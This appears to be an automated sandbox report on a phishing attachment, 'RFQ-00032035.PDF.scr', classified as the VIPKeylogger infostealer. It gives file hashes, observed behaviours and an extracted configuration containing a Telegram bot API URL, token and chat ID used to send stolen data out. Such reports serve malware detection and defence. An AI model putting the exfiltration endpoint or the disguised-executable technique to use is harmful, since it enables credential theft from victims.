General
-
Target
bb1734dc35fce4b73d1edb980b97459a3b97ca18.rar.tar.gz
-
Size
71KB
-
Sample
241001-c4yabawgmr
-
MD5
77f338ee49015065dbcbefee689ef456
-
SHA1
30862fc91fe894dd9dfcc44674cd720fb469fc22
-
SHA256
eddc1f1f36222555d38e95d9d3edf56bbe417fce33ec4c84135a586f7a7304d1
-
SHA512
126ace2e05581be3a4fb47c5f4a8934f81fb98af506485e11ce101046eeda08dfec1886e7b74c923631cfecd7947cd022260a3a6bedaa19fb13ccfbe85989321
-
SSDEEP
1536:qa/ASLzRvHzMsEIqEIqT4m9OXjfsPRKtDDe/hN+xrzLfQ8LHi:D/DHov89SjfAR6DSpN+lo8+
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-00032035.PDF.scr
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
RFQ-00032035.PDF.scr
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
RFQ-00032035.PDF.scr
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
RFQ-00032035.PDF.scr
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
RFQ-00032035.PDF.scr
Resource
win11-20240802-en
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7371892501:AAE6c_q-yLsVj82ZZEmMuRlQtTm95MBjCz0/sendMessage?chat_id=6750192797
Targets
-
-
Target
RFQ-00032035.PDF.scr
-
Size
186KB
-
MD5
4c7c55280d405f6241f4c9f236fdea24
-
SHA1
dfd1a0dce53f0a445ec6ad9f6d1266e96dec8f66
-
SHA256
013d183433171067d14d79fb2288fa94689963e60482da638800f23834710e19
-
SHA512
6cabc92097834307fb02f5687a19db6a93fe88f0c53cada037fe2f0eafb247ea7be249b460f53808a875c8febcf3460df235f8f4268370da92a11fb528dd0a10
-
SSDEEP
3072:qh1KoemdZEhelYiU8aTTwmDOop3Q+Rt5IxMSke+mNOGW3emb4XBHTtOhu2qkWf3M:Doemd3lYiU5MmDOop3Q+RsxMSke+mNOW
Score10/10-
Suspicious use of NtCreateUserProcessOtherParentProcess
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Accesses Microsoft Outlook profiles
-
Creates a large amount of network flows
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-